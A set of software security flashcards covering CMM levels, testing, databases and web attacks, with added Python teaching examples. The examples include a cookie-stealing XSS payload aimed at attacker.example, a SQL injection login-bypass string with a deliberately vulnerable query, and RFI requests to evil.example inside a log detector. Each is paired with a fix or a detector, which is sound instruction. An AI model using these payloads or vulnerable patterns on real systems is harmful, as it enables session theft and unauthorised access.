Software Dev Sec Flashcards
ORB
Object request broker: middleware that locates objects (local or remote) and routes method calls to them; examples include COM, DCOM, and CORBA
Defined
CMM level 3: the s/w process for both mgt and engineering activities is documented, standardized, and integrated into a standard s/w process for the org
genetic programming
seeks to replicate nature's evolution: creates random programs, assigns them the task of solving a problem, and breeds the best performers over successive generations
4 s/w freedoms
freedom to 1. use the s/w for any purpose 2. change the s/w to suit your needs 3. share the s/w w/ friends and neighbors 4. share the changes you make
compilers
take source code, such as C or BASIC, and translate it into machine code ahead of execution
PHP RFI
PHP remote file inclusion: altering the URL parameters that a PHP script passes to include()/require() so that the script fetches and executes attacker-hosted remote content; only possible when the PHP setting allow_url_include is enabled
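The classic vulnerable pattern is a script that does include($_GET['page']) without validation, so the attacker sends page=http://evil.example/shell.txt. The following is an added example, not code from the original flashcards: a small detector that scans web server access log lines for query-string values that name a remote URL or PHP stream wrapper, which is how an RFI attempt looks on the wire. The log lines are constructed for illustration and the combined log format is assumed.

```python
"""Flag HTTP requests whose query-string values are remote URLs or PHP stream
wrappers, the signature of an attempted remote file inclusion (RFI).

Added example, not part of the original flashcards. The log lines below are
constructed; the field layout assumed is the Apache/Nginx "combined" format.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Values that make include()/require() load code from somewhere other than the
# local filesystem. "php://" and "data:" are not remote hosts, but they are
# the standard ways to smuggle executable PHP through an inclusion parameter.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Constructed sample log lines (combined log format, one request per line).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 4096 "-" "curl/8.0"
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=HTTP%3A%2F%2Fevil.example%2Fshell.txt%00 HTTP/1.1" 200 4096 "-" "curl/8.0"
198.51.100.2 - - [10/Oct/2023:13:56:02 +0000] "GET /view.php?tpl=php://input HTTP/1.1" 200 128 "-" "python-requests/2.31"
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /search.php?q=https+in+titles HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def rfi_params(target: str) -> list[tuple[str, str]]:
    """Return (name, value) pairs in the request target whose value starts
    with a remote scheme or stream wrapper. parse_qsl URL-decodes first, so
    percent-encoded or mixed-case schemes are caught as well."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def scan_log(text: str) -> list[dict]:
    """Run the RFI check over each log line; return one finding per
    suspicious parameter with the client IP, parameter name and decoded value."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        for name, value in rfi_params(m["target"]):
            findings.append({"ip": m["ip"], "param": name, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} param={f['param']} value={f['value']!r}")
```

Matching on the decoded value matters: the third line above hides the scheme behind percent-encoding and appends a null byte (an old trick for truncating a ".php" suffix the script may append), and a prefix match on the raw target would miss it. A plain word like "https" inside a search term does not match, because only values that begin with a scheme are flagged.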
optimized
CMM level 5 (Optimizing): continual process improvement is enabled by quantitative feedback from the process and from piloting innovative ideas and technologies
repeatable
CMM level 2: basic proj mgt processes are established to track cost, schedule, and functionality; the necessary process discipline is in place to repeat earlier successes on similar projects
ANN
artificial neural networks: AI technique modelled on the neural networks found in humans and animals; learns by example through training rather than from hand-written if/then rules
types of CASE software
1. tools: support only specific tasks in the s/w production process 2. workbenches: support one or a few s/w process activities by integrating several tools in a single application 3. environments: support all or at least a large part of the s/w production process with a collection of tools and workbenches
bayesian filtering
statistical classification that scores a message on how likely its words are to appear in spam versus legitimate mail (Bayes' theorem); commonly used to ID spam
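How such a filter actually scores a message, as an added example that is not part of the original flashcards: a multinomial naive Bayes classifier trained on a handful of constructed messages. Real filters train on thousands of labelled messages and tokenise headers, HTML and attachments as well; the corpus here is invented and only illustrates the arithmetic.

```python
"""Naive Bayes spam filter trained on a few constructed messages.

Added example, not part of the original flashcards. The training corpus is
tiny and invented, so the probabilities are illustrative only.
"""
import math
import re
from collections import Counter

TRAIN = [  # constructed (text, is_spam) pairs
    ("win a free prize claim your money now", True),
    ("cheap meds free shipping order now", True),
    ("claim your free lottery prize today", True),
    ("meeting moved to tuesday please confirm", False),
    ("attached is the quarterly report for review", False),
    ("can we reschedule the project review meeting", False),
]

TOKEN_RE = re.compile(r"[a-z0-9']+")


def tokens(text: str) -> list[str]:
    return TOKEN_RE.findall(text.lower())


class NaiveBayes:
    """Multinomial naive Bayes with add-one (Laplace) smoothing."""

    def __init__(self, alpha: float = 1.0):
        self.alpha = alpha
        self.word_counts = {True: Counter(), False: Counter()}
        self.doc_counts = {True: 0, False: 0}
        self.vocab = set()

    def train(self, samples):
        for text, is_spam in samples:
            self.doc_counts[is_spam] += 1
            for w in tokens(text):
                self.word_counts[is_spam][w] += 1
                self.vocab.add(w)

    def _log_score(self, words, cls) -> float:
        """log P(cls) + sum of log P(word | cls) with smoothing, so a word
        never seen in one class cannot zero out that class entirely."""
        total = sum(self.word_counts[cls].values())
        denom = total + self.alpha * len(self.vocab)
        score = math.log(self.doc_counts[cls] / sum(self.doc_counts.values()))
        for w in words:
            score += math.log((self.word_counts[cls][w] + self.alpha) / denom)
        return score

    def spam_probability(self, text: str) -> float:
        words = tokens(text)
        spam = self._log_score(words, True)
        ham = self._log_score(words, False)
        diff = ham - spam
        if diff > 700:  # exp() would overflow: overwhelmingly ham
            return 0.0
        # Normalise the two log scores back into P(spam | words).
        return 1.0 / (1.0 + math.exp(diff))

    def is_spam(self, text: str, threshold: float = 0.5) -> bool:
        return self.spam_probability(text) >= threshold


def build_filter() -> NaiveBayes:
    nb = NaiveBayes()
    nb.train(TRAIN)
    return nb


if __name__ == "__main__":
    nb = build_filter()
    for msg in ("free prize money now", "please confirm the meeting review"):
        print(f"{nb.spam_probability(msg):.3f}  {msg}")
```

Scores are kept in log space because the product of many small per-word probabilities underflows a float quickly on a real message. The threshold is a tuning knob: raising it trades missed spam for fewer legitimate messages mis-filed, which is usually the more expensive error.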
Agile Manifesto values
1. individuals and interactions over processes and tools 2. working s/w over comprehensive documentation 3. customer collaboration over contract negotiation 4. responding to change over following a plan
scrum
named for the way rugby is played: not a relay race in which a baton is handed off, but a whole team moving the project forward by passing the ball back and forth as needed
datawarehouse
large collection of data gathered from one or more operational databases and organized for reporting and analysis
COM
component object model: Microsoft ORB that locates objects on a local system (DCOM extends it across a network)
SQL injection
manipulation of a back end SQL database through a front end web application that embeds untrusted user input directly in its SQL statements
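The mechanism in working code, as an added example that is not part of the original flashcards: the same login query built by string concatenation and then as a parameterised query, run against a constructed in-memory SQLite table. The plaintext password column exists only to keep the query short; never store passwords that way.

```python
"""SQL injection: the same login query built two ways.

Added example, not part of the original flashcards. The users table, the
credentials and the attacker input are all constructed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hunter2", "admin"), ("bob", "s3cret", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Builds the statement by concatenation: attacker text becomes SQL."""
    sql = (
        "SELECT username, role FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username: str, password: str):
    """Parameterised query: the driver passes the values separately from the
    SQL text, so a quote in the input is data, not syntax."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Classic tautology payload supplied as the password: it closes the string
# literal, then ORs in a condition that is always true. Because AND binds
# tighter than OR, the WHERE clause becomes
#   (username = 'alice' AND password = '') OR '1'='1'
# which matches every row.
PAYLOAD = "' OR '1'='1"


def demo() -> dict:
    conn = make_db()
    return {
        "vuln_legit": login_vulnerable(conn, "bob", "s3cret"),
        "vuln_attack": login_vulnerable(conn, "alice", PAYLOAD),
        "safe_attack": login_safe(conn, "alice", PAYLOAD),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

Against the concatenated query the payload returns every user, including the admin row; against the parameterised query it returns nothing, because the database looks for a password literally equal to the payload string. Input "sanitising" by quote-stripping is not a substitute: parameterisation is the fix.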
s/w testing levels
unit, installation, integration, regression, acceptance
white box s/w testing
gives the tester access to program source code, data structures, variables, etc
XSS
cross site scripting: injecting attacker-supplied web script (typically JavaScript) into a page so that it runs in the victim's browser within the security context of a trusted site, giving it access to that site's cookies, DOM and session
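A reflected XSS in miniature, as an added example that is not part of the original flashcards: a search page echoes the query into two places, the heading and an href attribute, first raw and then encoded for each context. The template and the payload are constructed.

```python
"""Reflected XSS: a search page that echoes the query back into HTML.

Added example, not part of the original flashcards. The page template and the
payload are constructed; the point is the difference between inserting raw
user text and encoding it for the context it lands in.
"""
from html import escape
from urllib.parse import quote

PAGE = (
    "<h1>Results for: {term}</h1>\n"
    '<a href="/search?q={attr}">Search again</a>'
)

# Constructed payload: the leading "> closes the href attribute and the <a>
# tag, then a script ships the session cookie to an attacker-controlled host.
PAYLOAD = '"><script>location="https://attacker.example/?c="+document.cookie</script>'


def render_vulnerable(term: str) -> str:
    """Drops attacker-controlled text straight into the markup."""
    return PAGE.format(term=term, attr=term)


def render_safe(term: str) -> str:
    """Encodes per context: HTML-escape in the element body (< > & and quotes
    become entities); percent-encode inside the URL, which also removes every
    character that could close the attribute or start a tag."""
    return PAGE.format(term=escape(term, quote=True), attr=quote(term, safe=""))


def contains_script_tag(markup: str) -> bool:
    """Crude check used only to show which rendering is exploitable."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print("----")
    print(render_safe(PAYLOAD))
```

The encoding has to match the context: HTML entity escaping is right for element bodies and attribute values, percent-encoding for URL components, and neither is sufficient inside a script block or an event handler. Real applications get this from an auto-escaping template engine plus a Content-Security-Policy rather than from hand-placed escape calls.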
source code
computer programming language instructions that are written in text that must be translated into machine code before execution by the CPU
open source
software whose source code is published openly, so anyone can read, modify and redistribute it
expert systems
1. knowledge base of if/then statements 2. inference engine that follows the tree formed by the knowledge base and fires a rule when there is a match
traceability matrix
used to map customer’s req’ts to s/w testing plan
primary key
a value (one or more columns) that uniquely identifies each tuple (row) in a table
black box testing
gives the tester no internal details; only inputs and observed outputs
dynamic testing
tests the code while executing it
installation testing
testing s/w as it is installed and first operated
4GL
fourth generation language: computer languages designed to increase programmer’s efficiency by automating creation of computer code; GUI focused; focus on creation of databases, reports, websites
closed source
software released in executable (binary) form only; the source code is not published
average # mistakes in computer code
commonly cited estimate: 10-50 mistakes per 1000 lines of code
database replication
mirrors a live database onto one or more replicas; depending on the design, clients may read from and write to multiple replicas simultaneously (multi-master), with the replicas synchronizing changes between themselves
relational database
contains 2-dimensional tables of related data
privilege escalation
allows an attacker with (typically limited) access to gain access to additional resources or higher privileges than intended
shareware
fully functional proprietary s/w that may be initially used free, but requires you to pay if you continue to use it
normalization
seeks to make the data in a database table logically concise, organized, and consistent.
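What normalization buys you in practice, as an added example that is not part of the original flashcards: a single wide orders table that repeats the customer's city on every row, versus a customers/orders split where each fact is stored once. The rows are constructed and SQLite is used only because it ships with Python.

```python
"""Normalization: the update anomaly a denormalized table invites, and the
two-table design that removes it.

Added example, not part of the original flashcards. Tables and rows are
constructed.
"""
import sqlite3

ORDERS = [  # constructed rows: (order_id, customer, city, item)
    (1, "acme", "Leeds", "bolts"),
    (2, "acme", "Leeds", "nuts"),
    (3, "zenith", "Hull", "wire"),
]


def denormalized_update() -> list[tuple]:
    """One wide table: the customer's city is repeated on every order, so an
    UPDATE that touches one row leaves the others stale (update anomaly)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE orders (order_id INTEGER PRIMARY KEY, customer TEXT, city TEXT, item TEXT)"
    )
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?, ?)", ORDERS)
    conn.execute("UPDATE orders SET city = 'York' WHERE order_id = 1")
    # The same customer now appears to be in two cities at once.
    return conn.execute(
        "SELECT DISTINCT customer, city FROM orders WHERE customer = 'acme' ORDER BY city"
    ).fetchall()


def make_normalized() -> sqlite3.Connection:
    """Customer facts live once in customers; orders hold only the key."""
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON")  # SQLite enforces FKs only when asked
    conn.executescript("""
        CREATE TABLE customers (
            customer_id INTEGER PRIMARY KEY,
            name TEXT NOT NULL UNIQUE,
            city TEXT NOT NULL
        );
        CREATE TABLE orders (
            order_id INTEGER PRIMARY KEY,
            customer_id INTEGER NOT NULL REFERENCES customers(customer_id),
            item TEXT NOT NULL
        );
    """)
    for order_id, customer, city, item in ORDERS:
        conn.execute("INSERT OR IGNORE INTO customers (name, city) VALUES (?, ?)", (customer, city))
        conn.execute(
            "INSERT INTO orders VALUES (?, (SELECT customer_id FROM customers WHERE name = ?), ?)",
            (order_id, customer, item),
        )
    return conn


def normalized_update() -> list[tuple]:
    """A single UPDATE on customers changes the city for every order."""
    conn = make_normalized()
    conn.execute("UPDATE customers SET city = 'York' WHERE name = 'acme'")
    return conn.execute(
        "SELECT DISTINCT c.name, c.city FROM orders o JOIN customers c USING (customer_id) "
        "WHERE c.name = 'acme' ORDER BY c.city"
    ).fetchall()


def orphan_order_rejected() -> bool:
    """Referential integrity: an order for a customer that does not exist
    must be refused once the foreign key is enforced."""
    conn = make_normalized()
    try:
        conn.execute("INSERT INTO orders VALUES (99, 42, 'gadget')")
    except sqlite3.IntegrityError:
        return True
    return False


if __name__ == "__main__":
    print("denormalized:", denormalized_update())
    print("normalized:  ", normalized_update())
    print("orphan order rejected:", orphan_order_rejected())
```

The normalized schema also lets the database refuse an order that references a non-existent customer, which the wide table cannot express at all. Normalization is usually carried to third normal form for transactional data; warehouses deliberately denormalize again for read performance.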
interpreted languages
executed by an interpreter at run time (often translated to an intermediate bytecode on the fly) rather than compiled to machine code ahead of time
integration testing
testing multiple s/w components as they are combined into a working system; subsets may be integrated and tested incrementally, or big bang integration testing tests all integrated s/w components at once
entity integrity
each tuple has a unique primary key that is not null
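The database enforcing entity integrity (and the primary key definition above) in working code, as an added example that is not part of the original flashcards: the same insert attempted with a fresh key, a duplicate key, and a NULL key against a constructed table. One caveat worth knowing: SQLite, used here because it ships with Python, lets a non-INTEGER PRIMARY KEY column hold NULL unless NOT NULL is declared explicitly (a documented legacy quirk), so the schema spells it out rather than relying on the SQL standard's implicit rule.

```python
"""Entity integrity enforced by the database engine: every row needs a
unique, non-NULL primary key.

Added example, not part of the original flashcards. The table is constructed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employees ("
        "  emp_id TEXT NOT NULL PRIMARY KEY,"  # NOT NULL is explicit: see lead-in
        "  name   TEXT NOT NULL)"
    )
    return conn


def try_insert(conn, emp_id, name) -> str:
    """Attempt an insert and report 'ok' or the integrity error the engine
    raised, rather than letting the exception propagate."""
    try:
        with conn:  # commits on success, rolls back on error
            conn.execute("INSERT INTO employees VALUES (?, ?)", (emp_id, name))
        return "ok"
    except sqlite3.IntegrityError as e:
        return f"rejected: {e}"


def demo() -> list[str]:
    conn = make_db()
    results = [
        try_insert(conn, "E001", "Alice"),        # fresh key: accepted
        try_insert(conn, "E001", "Alice again"),  # duplicate key: rejected
        try_insert(conn, None, "Nobody"),         # NULL key: rejected
        try_insert(conn, "E002", "Bob"),          # fresh key: accepted
    ]
    count = conn.execute("SELECT COUNT(*) FROM employees").fetchone()[0]
    results.append(f"rows={count}")
    return results


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Only the two rows with distinct, non-NULL keys survive; the rejected inserts are rolled back by the engine, which is the property application code should lean on instead of checking for duplicates itself and racing other writers.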
crippleware
partially functioning proprietary s/w, often with key features disabled; must pay to get the full version